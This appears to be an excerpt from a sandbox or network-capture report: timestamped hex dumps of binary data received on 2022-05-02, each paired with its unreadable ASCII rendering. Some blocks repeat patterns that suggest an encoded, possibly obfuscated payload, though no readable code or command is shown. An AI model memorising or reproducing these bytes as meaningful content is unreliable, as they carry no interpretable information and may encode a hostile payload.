5e d4 ba 75 2d db 5d 0d dd 6b d3 9d 0b 67 60 f2 11 74 97 c3 79 77 e4 7b c2 78 e3 35 fd 2e 33 04 cf b1 df
                                                                                  Data Ascii: Y65n3sqL/.[QL[,_kd?mMxbL3x1@<uW!4ip4?s*uE~lpocRI!{%;dz^/C[8-B#a&'L1%>bfpwFBD[P\a%iJ_^u-]kg`tyw{x5.3
                                                                                  2022-05-02 11:03:03 UTC1264INData Raw: 19 25 14 ef a8 6d fa 2f c1 96 4c b6 9d d2 b7 f3 90 a9 3d 80 e6 c2 ef d9 71 d1 59 0c 85 34 1a d7 d0 1f 89 5e 14 2c e2 a7 1a 7f 3e 23 01 39 ca aa 8b 9a 0e 48 80 7f 39 8f d3 f0 23 82 b5 00 da 2c 54 c9 0f 9f 33 b4 60 8a 44 61 ad f0 13 c7 18 64 12 e5 03 f4 ea c1 92 53 ec c0 0e b1 5e 57 26 51 32 86 b8 9b 84 4d b9 79 eb aa 4d 98 e5 0a 0b 3a 4f db cc d1 70 70 db 59 ef 5e 14 01 85 d7 bd a0 b9 a0 e2 c2 d3 75 d2 b7 66 39 ac 81 3e 50 c0 50 6e 7d b6 df ce 2b 2f 8e 45 48 d4 4d 98 57 fa 74 f9 08 3b a0 1a 49 48 d6 b3 29 ff 13 8f 0a 05 a7 aa 78 b9 d0 62 1b b0 ee 3c c5 ba 9a 04 0e 40 dd 06 45 20 34 67 b2 f5 ce 1c 07 21 58 a6 53 bc 6e ee 38 85 0b 7b 26 65 e6 6b 17 8a ec e5 7b fd f1 b7 aa 10 a1 a5 f1 91 38 81 d4 25 0f 5d a3 41 2f f1 68 4b a0 b1 cf 6e dc dd 46 90 4d 43 65 eb
                                                                                  Data Ascii: %m/L=qY4^,>#9H9#,T3`DadS^W&Q2MyM:OppY^uf9>PPn}+/EHMWt;IH)xb<@E 4g!XSn8{&ek{8%]A/hKnFMCe
                                                                                  2022-05-02 11:03:03 UTC1265INData Raw: ea 5f 58 3d 7d 3a 6e 45 f3 c6 cd c3 cc 95 1f e3 84 35 50 c4 88 e3 8d 34 42 67 39 06 60 59 4a ef 26 4e 61 02 0f 31 5b c1 e1 33 93 5d 8b a3 21 9a f4 6e d2 98 f8 6e 9d 63 ec b5 9b f8 64 53 8b ce f1 03 a2 ab ad 95 ea 0c c2 ec aa ef 97 f8 f4 88 c4 a0 d5 bb a9 85 05 c5 9a b1 65 3c 75 8a 77 d4 7c 07 69 b6 45 db a8 31 fc 6e be df c1 8c 15 0f 1b de aa a0 03 de f4 10 c1 97 78 f0 0b 67 72 06 1d 9e 79 c6 48 f1 ad ce 6c 03 9c 0f c1 1d 78 1a a0 37 6b c4 5e b3 fc 1f ec 4b 72 e6 da 17 21 a8 7d 13 3c f1 50 3a 7f 21 fa b2 fd df 71 1b 37 47 50 31 f6 02 24 74 f5 7e 27 06 62 55 a6 db 98 98 44 4f 64 c1 71 ad f5 3b 1c 49 a5 3a 96 4b c5 c4 a3 43 bf ca b2 90 8d b2 f1 36 32 ac 75 2e 52 0a 22 82 55 1b 32 48 6b e8 14 ec 5f 30 86 e7 00 df 3f a4 45 29 df c7 2d e9 dd e1 e7 81 fc 22 d6
                                                                                  Data Ascii: _X=}:nE5P4Bg9`YJ&Na1[3]!nncdSe<uw|iE1nxgryHlx7k^Kr!}<P:!q7GP1$t~'bUDOdq;I:KC62u.R"U2Hk_0?E)-"
                                                                                  2022-05-02 11:03:03 UTC1266INData Raw: 1a 71 47 86 ab a6 7c 68 aa bc 30 6b 58 7e ab 29 a1 d4 5e f6 e9 80 88 77 13 00 a0 fb b4 e0 80 6f e0 d3 81 bd 4c 68 98 48 9e 32 a0 37 99 6d 2c 66 c3 66 44 6c c2 2b d4 08 21 60 17 c8 ce 97 fb 70 a0 96 c5 d9 81 7f ba ac 6a 1a 36 ff ea d0 9d 94 88 0b 15 2a 61 fe 5d 22 e0 01 8d 20 59 92 5f 73 38 67 1f 92 25 da 11 17 c8 7f ee 27 6b 07 b9 bc 1f 62 b7 e7 a0 a8 e0 92 39 d4 19 93 04 24 24 f4 41 9c 4d 36 ac 9e 47 f9 30 90 3d d3 4f 95 35 12 2d 3d 19 85 d7 2a 49 b0 99 9e d2 0a 65 6c 65 b0 e3 ab 4d 83 a9 d1 6f 84 ee a4 2b 45 08 1c 89 ac 7c 0f a7 4c d7 b0 4e b7 1f 45 b5 79 fa c5 9f e0 70 cd c8 fb 6e 4e 48 93 24 3c 65 4b ce f8 32 36 a9 b9 d2 fd 48 a1 c6 3a a7 01 6a 60 53 98 ee 4a 2c 27 5e 09 85 25 0a 99 47 3d 9a 6a df 12 2e 3b 7e e5 64 02 71 3e 53 c7 6a 87 a5 35 5f 02 0a
                                                                                  Data Ascii: qG|h0kX~)^woLhH27m,ffDl+!`pj6*a]" Y_s8g%'kb9$$AM6G0=O5-=*IeleMo+E|LNEypnNH$<eK26H:j`SJ,'^%G=j.;~dq>Sj5_
                                                                                  2022-05-02 11:03:03 UTC1268INData Raw: 1f d2 cb f8 ad 88 40 80 a0 ac 49 40 80 a0 8f ab 92 1f b1 fc c9 a9 88 1c 04 88 16 9f c9 9a 95 88 40 80 a0 ac 49 40 80 9f 9d ab 92 0c bb 90 fd 8d 88 08 05 88 03 83 cc f3 b4 88 40 80 a0 ac 49 40 80 a0 b2 ab 92 08 ab 82 fb b0 88 08 02 88 37 1d f5 9f a1 84 88 40 80 a0 ac 49 40 80 a0 84 ab 92 10 b1 d3 db 9e 88 0b 10 83 8a 84 99 88 0b 1a 87 c4 8e b1 88 0f 85 ee ab 93 88 40 80 a0 ac 49 40 80 a0 9f ab 92 0a d2 eb dd 91 88 0b 1d bf d5 f0 a6 88 0b 0b 88 c0 f9 b1 88 06 a9 82 cc aa 88 40 80 a0 ac 49 40 80 a0 8e ab 92 0b f4 a0 9f ac 88 92 08 f4 91 97 84 88 05 fb e6 b9 a3 88 40 80 a0 ac 49 40 80 a0 89 ab 92 0f d4 e3 e8 bc 88 37 12 d6 f5 a2 83 88 40 80 a0 ac 49 40 80 a0 9d ab 92 1a a8 bf 8a 93 88 77 77 15 84 be 94 8a 88 40 80 a0 ac 49 40 80 a0 9a ab 92 14 8f cd c2 aa 88
                                                                                  Data Ascii: @I@@I@@I@7@I@@I@@I@@I@7@I@ww@I@
                                                                                  2022-05-02 11:03:03 UTC1269INData Raw: 80 a0 ac 49 40 80 9f a7 ab 92 10 e1 ad f3 b9 88 37 1c 06 88 06 e1 81 d9 ba 88 40 80 a0 ac 49 40 80 9f 93 ab 92 0f b2 c1 dd ac 88 34 06 ff c5 f6 88 37 10 d4 bd e8 8b 88 40 80 a0 ac 49 40 80 a0 93 ab 92 13 97 b6 e2 8e 88 77 77 15 84 be 94 8a 88 40 80 a0 ac 49 40 80 9f 8e ab 92 1f e2 8d da 86 88 1c 03 88 1e 90 ed d0 b1 88 40 80 a0 ac 49 40 80 9f ac ab 92 0d c2 83 d8 88 37 1c 06 88 06 e1 81 d9 ba 88 40 80 a0 ac 49 40 80 9f b3 ab 92 07 fa b6 8a 9e 88 92 09 9c 93 d4 82 88 92 0b f9 d0 94 ae 88 05 9f f5 ca b2 88 40 80 a0 ac 49 40 80 9f ba ab 92 01 80 93 9d 91 88 34 06 ff c5 f6 88 37 10 d4 bd e8 8b 88 40 80 a0 ac 49 40 80 9f 8d ab 92 1f e2 8d da 86 88 1c 03 88 1e 90 ed d0 b1 88 40 80 a0 ac 49 40 80 9f b1 ab 92 18 a1 ed 87 b0 88 37 0b 05 d8 d2 89 ad 88 06 c8 b3 df
                                                                                  Data Ascii: I@7@I@47@I@ww@I@@I@7@I@@I@47@I@@I@7
                                                                                  2022-05-02 11:03:03 UTC1270INData Raw: 12 88 10 34 01 88 88 03 9a 88 17 88 01 1d 1d 8d 0f 00 48 05 8f 88 0d 48 0b 01 86 88 01 a2 88 1d 8e 0f 02 ac 88 10 34 2c 88 02 86 88 03 88 01 1d 1d 8e 0f 05 a4 88 10 34 01 8e 88 03 ab 88 10 88 01 1d 1d 8e 0f 2f 88 10 0d 1d 0e 88 01 1d 1d 8e 0f 03 80 88 10 0d 1d 1b 88 01 1d 1d 8d 0f 00 48 02 8a 88 10 0d 1d 0d 88 01 1d 1d 8e 0f 11 88 10 0d 1d 12 88 01 1d 1d 8e 0f 25 88 09 48 40 80 9c 91 49 1d 8e 0f 03 a3 88 7d 1d 8e 97 60 80 b1 9f 69 01 9e 88 10 34 2a 88 02 80 88 02 88 02 1d 1d 8e 0f 10 88 07 48 34 38 88 02 a8 88 1d 8e 0f 04 b7 88 07 48 34 01 8f 88 03 ae 88 1d 8e 0f 24 88 10 0b 01 aa 88 01 95 88 0d 88 02 1d 1d 8e 0f 1c 88 0d 48 0b 1f 88 3b 88 1d 8d 0f 00 48 04 87 88 10 07 1d 0d 88 02 1d 1d 8e 0f 0e 88 7d 1d 8e 47 60 80 b1 9e 69 0c 88 07 48 34 01 8f 88 03 af
                                                                                  Data Ascii: 4HH4,4/H%H@I}`i4*H48H4$H;H}G`iH4
                                                                                  2022-05-02 11:03:03 UTC1272INData Raw: 10 07 1d 0f 88 02 1d 1d 8e 0f 01 bd 88 10 07 1d 0c 88 02 1d 1d 8e 0f 02 9c 88 10 7f 02 88 05 1d 05 88 0b 1d 1d 8e 0f 03 b1 88 29 a2 31 40 88 01 98 1d 8e 0f 01 97 88 7d 1d 8e 47 60 80 b1 9f 69 02 95 88 10 07 1d 07 88 02 1d 1d 8e 0f 03 95 88 7d 1d 8e 97 60 80 b1 9f 69 02 bd 88 10 07 1d 0a 88 02 1d 1d 8e 0f 2b 88 7d 1d 8e 97 60 80 b1 9e 69 05 a0 88 10 07 1d 06 88 02 1d 1d 8e 0f 01 93 88 10 0d 1d 07 88 01 1d 1d 8e 0f 31 88 10 0d 1d 0c 88 01 1d 1d 8e 0f 03 b7 88 10 07 1d 0b 88 02 1d 1d 8e 0f 03 8b 88 10 34 01 82 88 03 87 88 12 88 01 1d 1d 8e 0f 30 88 07 48 34 01 91 88 03 b3 88 1d 8e 0f 03 ad 88 10 0d 1d 11 88 01 1d 1d 8d 0f 00 48 04 9f 88 10 07 1d 02 88 02 1d 1d 8e 0f 02 b0 88 10 0b 01 90 88 01 a5 88 00 88 01 1d 1d 8e 0f 03 a5 88 10 34 01 88 88 03 98 88 17 88
                                                                                  Data Ascii: )1@}G`i}`i+}`i140H4H4
                                                                                  2022-05-02 11:03:03 UTC1273INData Raw: 04 86 88 10 07 1d 02 88 02 1d 1d 8e 0f 04 81 88 7d 1d 8e 97 60 80 b1 9e 69 04 a0 88 0d 48 0b 09 88 07 88 1d 8e 0f 04 85 88 0d 48 34 01 87 88 03 96 88 1d 8e 0f 03 b6 88 10 0d 1d 15 88 01 1d 1d 8e 0f 01 9a 88 7d 1d 8e 47 60 80 b1 9f 69 03 83 88 10 34 01 ab 88 01 bd 88 19 88 01 1d 1d 8d 0f 00 48 05 a1 88 60 80 b1 90 69 09 48 60 80 b1 8f 69 04 60 80 b1 8e 69 60 80 b1 8c 69 ad ad 60 80 b1 8d 69 25 00 88 60 80 b1 8c 69 ad 60 80 b2 9f 87 00 98 1d 8e 0f 03 a9 88 0d 48 34 01 8a 88 03 a0 88 1d 8e 0f 03 85 88 10 34 3e 88 02 ba 88 01 88 01 1d 1d 8e 0f 04 88 7d 1d 8e 97 60 80 b1 9e 69 05 88 10 07 1d 07 88 02 1d 1d 8e 0f 05 9e 88 10 0b 01 86 88 02 95 88 08 88 02 1d 1d 8e 0f 1d 88 7d 1d 8e 97 60 80 b1 9f 69 0b 88 07 48 34 2b 88 02 81 88 1d 8e 0f 04 94 88 7d 1d 8e 97 60
                                                                                  Data Ascii: }`iHH4}G`i4H`iH`i`i`i`i%`i`H44>}`i}`iH4+}`
                                                                                  2022-05-02 11:03:03 UTC1274INData Raw: 88 0b 1d 1d 8e 0f 03 bb 88 10 0b 01 9a 88 31 88 03 88 01 1d 1d 8e 0f 04 a2 88 3d b1 1f 04 9b 0b 1d 04 1d 1d 8e 0f 03 96 88 0b 48 02 1d 1d 8e 0f 02 91 88 22 8b 97 05 1d 1d 8e 0f 01 bc 88 07 48 34 31 88 02 94 88 1d 8e 0f 02 80 88 10 0b 01 9f 88 30 88 1e 88 01 1d 1d 8e 0f 01 9c 88 10 0d 1d 14 88 01 1d 1d 8e 0f 01 b4 88 10 0b 16 88 03 a1 88 09 88 01 1d 1d 8e 0f 03 88 88 7d 1d 8e 47 60 80 b1 9f 69 04 9b 88 10 34 01 8b 88 03 a1 88 14 88 01 1d 1d 8e 0f 03 b3 88 10 34 19 88 01 99 88 11 88 01 1d 1d 8e 0f 18 88 10 0d 1d 0b 88 01 1d 1d 8d 0f 00 48 05 a6 88 07 48 34 2d 88 02 87 88 1d 8e 0f 01 a7 88 10 0b 01 83 88 01 83 88 03 88 01 1d 1d 8e 0f 01 b1 88 7d 1d 8e 97 60 80 b1 9f 69 0e 88 0d 48 34 2d 88 02 88 88 1d 8d 0f 00 48 04 b6 88 10 0d 1d 1a 88 01 1d 1d 8e 0f 2d 88
                                                                                  Data Ascii: 1=H"H410}G`i44HH4-}`iH4-H-
                                                                                  2022-05-02 11:03:03 UTC1276INData Raw: 1d 05 88 02 1d 1d 8e 0f 03 93 88 0d 48 0b 23 88 03 8e 88 1d 8e 0f 04 92 88 10 0d 1d 0c 88 01 1d 1d 8e 0f 01 bb 88 07 48 34 01 9a 88 02 89 88 1d 8e 0f 36 88 2c 99 47 9b 05 1d 1d 8e 0f 04 ad 88 0d 48 34 32 88 02 96 88 1d 8e 0f 02 8f 88 10 0b 01 91 88 01 8a 88 1b 88 01 1d 1d 8e 0f 02 8c 88 10 0d 1d 15 88 01 1d 1d 8d 0f 00 48 01 96 88 0d 48 34 3e 88 01 bd 88 1d 8d 0f 00 48 03 a6 88 0d 48 34 01 af 88 02 85 88 1d 8e 0f 02 ab 88 10 0d 1d 0d 88 01 1d 1d 8e 0f 03 98 88 10 0d 1d 17 88 01 1d 1d 8d 0f 00 48 03 92 88 10 34 3a 88 02 b0 88 09 88 02 1d 1d 8e 0f 03 9b 88 10 34 3d 88 02 b8 88 0d 88 01 1d 1d 8e 0f 10 88 7d 1d 8e 97 60 80 b1 9e 69 01 8d 88 10 0d 1d 11 88 01 1d 1d 8e 0f 02 a1 88 7d 1d 8e 47 60 80 b1 9e 69 01 80 88 10 0d 1d 02 88 01 1d 1d 8e 0f 01 82 88 10 0b
                                                                                  Data Ascii: H#H46,GH42HH4>HH4H4:4=}`i}G`i
                                                                                  2022-05-02 11:03:03 UTC1277INData Raw: 9a 47 88 28 82 32 89 37 98 25 ae 25 88 32 9b 3b ae 2d b8 41 a2 30 86 46 82 45 a7 3b 88 47 a8 2c ad 28 96 37 b0 31 b5 30 a2 43 a8 44 80 23 a3 20 90 3e a0 40 89 44 bc 20 b0 1e a6 46 98 29 a2 20 84 2f b2 48 9a 2e bb 1e 82 49 98 39 92 39 a2 3d 8d 31 ab 20 98 40 a0 27 8b 43 9c 30 a9 1d ae 38 b4 20 8a 3e 94 29 88 36 be 24 a5 22 a2 47 81 41 ac 20 b8 3a 9f 46 9e 35 bf 2b a4 1e b6 37 84 29 b2 49 9e 3a 96 25 9c 28 9c 05 a8 a1 00 1d 1d 8d 0f 00 48 05 a2 88 a3 11 48 00 88 60 01 a0 80 83 a9 87 01 a0 80 83 86 69 24 a9 28 01 a0 80 81 be 62 01 a0 80 82 81 62 01 a0 80 81 ad 62 01 a0 80 80 a3 69 20 80 86 81 19 1d 87 47 11 1d 1c bc 57 7d 1c bc 57 01 a0 80 8e 8c 62 17 1d 1c b9 47 17 1d a3 1c b4 57 11 48 01 88 7d 1c b4 57 11 48 9d 00 88 01 a0 80 8e a6 62 22 1d 10 1d 01 a0 80
                                                                                  Data Ascii: G(27%%2;-A0FE;G,(710CD# >@D F) /H.I99=1 @'C08 >)6$"GA :F5+7)I:%(HH`i$(bbbi GW}WbGWH}WHb"
                                                                                  2022-05-02 11:03:03 UTC1281INData Raw: a5 01 4a 01 64 01 57 01 0f 01 48 01 ab 01 9c 01 af 01 05 3a 00 00 39 60 e8 cc e4 6d e7 fc d0 90 20 19 1c d3 6b 97 c2 89 a4 44 20 72 f4 6a 68 12 6a 7c 95 82 af 0c 1c 74 0d df e3 5d b0 0f a0 5a 5c 02 ac f0 eb eb f7 89 5c 3e cc ca a7 2b 7d 41 fb bf f7 28 94 52 13 bc 75 34 52 50 c3 09 23 dc 25 41 fb 53 33 dd c8 f2 5b a1 da 1c 4c 5e 03 e7 20 39 ec 8f 98 5c b5 67 a3 f2 4e 17 d8 c4 0b d2 f6 28 5b 54 48 14 2c 95 51 c2 e5 bc 86 be 53 13 e3 39 c8 83 96 14 54 47 bc 90 46 1a 17 08 83 51 3a 8a d1 e3 ba fd 5e 72 a8 69 23 54 d5 1e 98 74 9c 91 19 da 8f e2 f2 2a 63 3d 64 5e 28 b0 37 d6 ae 16 43 80 a8 4d e3 dc 15 fe ef 49 29 b8 3f 1a 10 97 26 16 03 c8 83 c2 38 ef 97 8f 24 1b eb eb f6 90 2b 1d 4e 2c ba 77 0b e8 44 a6 b4 9a ab d3 e4 60 25 b2 60 19 5d 22 27 fa 98 e2 c8 af fd
                                                                                  Data Ascii: JdWH:9`m kD rjhj|t]Z\\>+}A(Ru4RP#%AS3[L^ 9\gN([TH,QS9TGFQ:^ri#Tt*c=d^(7CMI)?&8$+N,wD`%`]"'
                                                                                  2022-05-02 11:03:03 UTC1285INData Raw: c3 3a 5b 0a f9 3b cf 45 b4 55 38 8d bf 3c fa 97 ce d5 fc b3 8b a0 52 61 13 b8 eb eb e6 5d 60 aa 5b 2a 19 7f 2f 7b 8c 12 99 ec ff bc 89 e3 89 5a ba d3 14 2e fe eb eb e6 4b 3c 43 0e 23 98 b4 a1 a2 5f f9 81 f8 c0 2b 42 cf c0 62 0b 11 ef b3 cf de 68 5c b2 6c 64 1e d4 ac af a8 38 dd 59 3b 95 eb eb e6 20 4e a8 19 77 62 4e 4c 40 cf e5 18 3f 1d 11 46 e5 c5 0b ed e5 b0 e0 eb eb e6 f1 d9 76 1c a2 54 ee 3a 3b a8 a4 b7 73 4e bc ea eb eb e6 fb 70 70 75 4b 5b eb d5 a7 5f c4 45 16 4c 59 f8 0c eb eb e6 c6 15 52 df 11 4d 97 c2 cc 57 64 70 ab a7 e8 d4 37 8e 39 fa 39 6f eb eb e6 b0 4f 1f a1 35 ee 6a d1 ee 71 26 f3 44 39 4b c4 3c ca a6 eb eb e6 bb 45 07 6e 9b b5 c4 98 a0 20 a8 0a 06 ae eb eb e6 81 38 e3 69 86 8f d2 3f a3 39 41 e3 af 91 eb eb e6 90 82 6d 2f 7c 15 2e 3f ec 98
                                                                                  Data Ascii: :[;EU8<Ra]`[*/{Z.K<C#_+Bbh\ld8Y; NwbNL@?FvT:;sNppuK[_ELYRMWdp799oO5jq&D9K<En 8i?9Am/|.?
                                                                                  2022-05-02 11:03:03 UTC1286INData Raw: f4 74 eb eb ea 62 64 80 d8 28 18 2e 08 7b 0e 1c ad f6 4e 7d b8 7d eb eb ea 44 c4 3f db bb 90 10 75 4f b9 da 99 2d 0b d1 d3 af 0d 92 ea 7d 1d ce b1 01 69 5e ab 17 67 1a 22 49 9c 6d 4a b4 eb eb ea 10 eb 4e aa 79 4c 08 60 8e 11 6e 3e 4f a4 59 0c e6 d6 e8 d7 33 a3 cc 0d aa ba 21 24 20 46 c0 cf 31 8f c9 dd 8e 1e c6 79 5b 14 78 a4 53 fc d2 9a 48 01 03 ef 6b 1b 0e eb eb ea dc fa fb 52 47 4a bc 58 0a 3a 53 8d 70 ce cd 93 cb 97 11 09 cc db 9f 37 8f fe 7c ac cb c3 bd a9 ed 97 78 00 0e 25 44 21 e8 67 f7 72 f0 f1 74 f2 c4 ef 3e 8f c8 89 a1 f1 cc ac 8c d4 eb eb ea 90 e7 d2 b4 32 00 b9 d2 7b 24 40 b5 85 e5 e6 5f 23 f2 36 bb 9a 34 0a 82 30 91 9c cb ad 7f 74 f2 2f b8 eb c7 15 dd 60 e9 3d da 1b 9f 8a 7e 97 1f 90 8c d0 dc 2e eb 17 4c eb eb ed 51 74 5e 93 99 7e 13 f2 ad 5d
                                                                                  Data Ascii: tbd(.{N}}D?uO-}i^g"ImJNyL`n>OY3!$ F1y[xSHkRGJX:Sp7|x%D!grt>2{$@_#640t/`=~.LQt^~]
                                                                                  2022-05-02 11:03:03 UTC1291INData Raw: b4 bd de 6a ad 2e 26 ec e4 70 85 43 93 1a 4c af af 79 c1 4e 8c 17 2b 23 0f be da 53 e8 ab eb 2f 8f d9 f8 0b 03 0a e4 a7 a0 ad 0b 0f 60 7b 1b 12 6b f3 ae e5 5c 27 50 8a 85 ac e9 f9 fa bd d5 6b 75 18 c4 48 c3 d8 ff 59 a3 60 c0 84 ca 25 54 50 7d 39 f8 14 53 44 5c 21 42 8d 0d 31 3c 67 23 1f 65 20 10 d5 37 2b b7 9c 73 34 7b 6c 92 88 fa 78 43 c6 e8 dc 81 a7 38 e5 60 ff 25 ff 3f ba 36 1a a3 24 a7 5f bc da 02 b0 07 e6 b2 d8 c5 27 5b 52 22 40 66 ee 6c aa ea 10 ec 1c b6 b6 2b f8 2c 26 6c 3c 8e 70 29 18 bd e3 ec 81 92 85 a7 0f 83 97 18 35 6a d9 f0 cf 55 4c a6 8d ff 99 50 40 67 0b 9b 33 b4 b0 2e 39 07 1d 58 98 c3 97 3a a7 45 21 ae b1 92 8e b8 5f 73 c0 13 34 00 e9 bc c9 82 b3 f9 64 37 8d 99 bf d9 c5 6f ef c1 6b c7 63 33 ab 2f 08 9a 9d 56 8a 8a 41 0b ca b4 ff f2 91 81
                                                                                  Data Ascii: j.&pCLyN+#S/`{k\'PkuHY`%TP}9SD\!B1<g#e 7+s4{lxC8`%?6$_'[R"@fl+,&l<p)5jULP@g3.9X:E!_s4d7okc3/VA
                                                                                  2022-05-02 11:03:03 UTC1295INData Raw: 5d ee 3f 80 69 c0 8b 42 07 5b fb d9 fc 33 20 46 76 03 c9 e6 7f a9 d5 9a 87 9e 03 4f 53 8e 55 75 3f 60 9d a4 eb df 24 16 18 67 f2 d1 d0 13 92 6e 61 53 b7 30 ba 7d 8c 5e b3 30 e0 d5 fd 89 8a 6d ed a3 09 10 67 5f 96 d8 bf 61 a2 af 13 54 98 64 f9 59 28 a3 03 cf fc 4d c0 56 e6 b2 51 17 4e 18 d3 4e cc a3 64 ba 93 c4 40 18 4f 79 7d c7 13 e3 12 32 5f 02 4c e1 08 27 b9 53 f9 2e f1 89 70 63 f2 98 e9 b8 28 8b 88 2b e7 22 ad 05 a0 9c 9c dc 72 53 20 60 b6 59 dd 2a 67 b5 49 df bf 62 1e 90 f2 5e 97 09 e2 93 89 81 ca 53 c8 e7 66 fb 3e 47 1c d2 78 ff 55 c9 ea 60 c1 21 db 14 e4 d6 3d fe b2 2d 82 05 17 71 ed 37 97 6e c7 03 e0 cb 66 ef 8e 8f 26 f6 f5 20 c5 28 45 84 40 7f 70 a1 ae 59 90 77 ce b5 47 99 eb 39 59 eb 72 80 5c fb a5 be f6 d8 4e f5 18 05 a3 03 cc 4d e2 02 e5 d8 59
                                                                                  Data Ascii: ]?iB[3 FvOSUu?`$gnaS0}^0mg_aTdY(MVQNNd@Oy}2_L'S.pc(+"rS `Y*gIb^Sf>GxU`!=-q7nf& (E@pYwG9Yr\NMY
                                                                                  2022-05-02 11:03:03 UTC1299INData Raw: 85 0a 64 79 0f f0 79 48 10 52 c5 78 df 0c 50 62 90 38 d0 97 d5 2c 85 7b 0d bc 7a d3 fe 9d 73 f2 6d ee 86 5f d5 68 c8 5e dd 61 1d 9b 3e 3f f3 bf 75 ee 83 fd 4b 99 53 c2 0b f9 66 dd cb f7 d9 0c d9 91 5c 81 0e 0b f9 4d e1 fd bc 43 48 aa b0 4e 85 17 8b 88 45 a0 8d e4 ff 5c 61 e6 ce c8 e6 08 57 10 96 3b 25 1a 4d 8f 64 46 f0 a5 4c d8 9c e4 cc a3 05 f0 b8 b1 ef 13 67 ed a2 29 d2 e2 f0 24 98 89 67 59 b7 2b 5d 27 b7 8b 52 6e 6e 6c 4e 5c 2e 73 d4 b7 c2 23 b7 4e c4 2f 56 2d 0d 5b ac e0 e3 38 30 6a 22 fa 79 ff 28 db 96 bf 4c aa ad 7d ce 98 39 9f 41 9b a6 f5 40 2a 3c f7 cb 4e 68 e3 d8 06 88 70 4c e3 21 8d 7a 76 a9 68 75 a4 b8 08 96 d3 86 b6 0d ec f0 30 fa be dc 6c d2 46 0a 3c 2e 74 ed d7 14 25 be e7 82 bc 5c c3 9b be 0b f4 67 3f 34 26 0c e0 f2 70 b1 92 b4 c3 96 86 e0
                                                                                  Data Ascii: dyyHRxPb8,{zsm_h^a>?uKSf\MCHNE\aW;%MdFLg)$gY+]'RnnlN\.s#N/V-[80j"y(L}9A@*<NhpL!zvhu0lF<.t%\g?4&p
                                                                                  2022-05-02 11:03:03 UTC1303INData Raw: 50 a7 80 d4 5f 94 c3 14 7a 70 92 c8 e7 f0 c6 9d f9 49 43 af 2d 3d e9 2e 2f 28 67 ba 5a a3 ab 8d cd 88 46 79 5a f7 37 de e3 fe 7f c9 a0 72 e7 3f 29 03 e0 ce 1a 75 be a8 a4 6f 42 12 cc 06 e7 90 52 86 f5 9d a8 fd 55 a9 80 90 fc be 03 b9 00 fa 68 1a 16 04 36 18 5f 2a b0 86 6b 15 d1 ec 66 5c 4f c9 f0 33 a5 88 cd f1 c5 0e 07 42 1b 7f 54 0a 53 a1 ed 49 42 ff da 47 61 df 8f 73 e6 1f 44 c8 9a 0d 78 b5 f9 45 e0 50 f1 99 f8 8f cd fd 40 6e ef ed 82 8b 9f c1 6a 4a 0d a7 27 d4 e7 a5 9b 9e 2e 20 fb 7a e9 b1 ae 0f 89 a4 08 72 ac b5 61 07 eb 91 d6 51 d8 73 e0 da ac 47 9a 51 01 99 00 cd da 38 9d 0c 86 57 22 ad 58 bf bc e2 97 3e 1d 9a 57 25 45 fb 8b b3 0f ef d9 8d 97 9c 8d 46 75 97 b0 74 c5 78 c6 54 9b e8 3f 08 d4 c5 36 5e fb 89 af c9 8c 15 e7 6b fc c7 c3 f4 a4 aa 1b 83 f9
                                                                                  Data Ascii: P_zpIC-=./(gZFyZ7r?)uoBRUh6_*kf\O3BTSIBGasDxEP@njJ'. zraQsGQ8W"X>W%EFutxT?6^k
                                                                                  2022-05-02 11:03:03 UTC1307INData Raw: d5 73 8c a4 fc e2 17 08 b1 fe 57 d7 e8 60 bf 38 47 45 da f1 8b ce 60 16 e9 98 fa 4f 90 a7 8d e5 91 79 4a f3 09 15 24 c4 b3 fa a4 4c c4 55 c5 40 a8 ff 9c 75 1d 93 d8 1f 2b 9c 34 32 e0 4c a7 0d 75 23 58 6e 7c 48 69 31 45 0c 21 14 72 1a 20 50 e3 40 38 85 15 73 c5 aa 64 b5 74 ee f4 25 14 e8 dd c2 6e 39 10 c7 c1 f4 74 34 00 77 90 77 6d 4c e6 1d 63 67 2e 6e f7 a4 62 d1 67 a6 7b 96 76 98 24 4e f3 0f e0 f6 77 15 d5 f1 cd 89 f2 f6 4d f9 b7 81 71 27 4c 11 52 7f 8a 60 05 f9 91 50 e0 48 10 62 2f e3 79 16 4c 2b ed 6f 1c ec 2a 40 a6 08 0e c0 10 30 70 4e ba c8 2f 70 79 5f 22 5e e7 48 26 d2 75 96 5b cd 7a 5c 57 50 72 d0 a6 a5 67 84 df e9 bd 67 ca 90 b2 19 f7 c4 f4 77 a1 56 f5 43 5d 7b d3 ff 39 77 d1 6a 8f ae 84 f5 50 f0 05 c3 e6 f1 43 96 7c 77 4b a8 55 84 b9 ff 8c ac ce
                                                                                  Data Ascii: sW`8GE`OyJ$LU@u+42Lu#Xn|Hi1E!r P@8sdt%n9t4wwmLcg.nbg{v$NwMq'LR`PHb/yL+o*@0pN/py_"^H&u[z\WPrggwVC]{9wjPC|wKU
                                                                                  2022-05-02 11:03:03 UTC1311INData Raw: 81 b8 5e f4 89 1c 12 0a 2a 59 7e 10 b7 05 33 6e 4a 68 df 35 0f d7 e2 18 b6 3b 2f 2c 49 65 16 9b 46 c6 35 a7 6d 75 11 ff 7d 12 ad 37 20 87 d3 ab 9a 20 7b 3e 73 93 6f 5c cb 17 87 6a 23 87 aa 1b 90 55 fc 83 54 30 2c ce 79 45 cc f3 03 f4 6b 42 8c d7 86 88 99 6b fc 11 f5 19 f9 15 88 8e 5c fa 96 57 43 5d 47 98 ef c9 b0 10 89 60 69 97 63 f2 49 9e 2e 5a 6a b9 c2 fb 35 b4 51 5a 63 77 98 ba 9c 8f bb 91 c8 e5 90 ad c7 48 ec 0a cd 10 43 37 a7 bc 0e 5e 8f d2 41 69 b3 4c 51 82 a3 16 2a 13 c1 12 36 db 92 4b e5 93 ee 4b 67 aa e3 47 54 f8 0c b1 65 2a 79 e9 f7 45 8b 4e f3 3d e0 6f 52 dc bc b3 f2 2f 4d 0b de 4a f6 8c 7f b3 9e a4 cf 9b b9 fe f3 c2 39 84 c2 a3 ed 06 5d dc 6a 89 aa 71 4f eb df 44 ca f7 a5 e9 ae 78 47 bc d0 90 25 ef 1a 7a a2 f0 f8 32 42 c3 8f d9 b4 20 6c 77 da
                                                                                  Data Ascii: ^*Y~3nJh5;/,IeF5mu}7 {>so\j#UT0,yEkBk\WC]G`icI.Zj5QZcwHC7^AiLQ*6KKgGTe*yEN=oR/MJ9]jqODxG%z2B lw
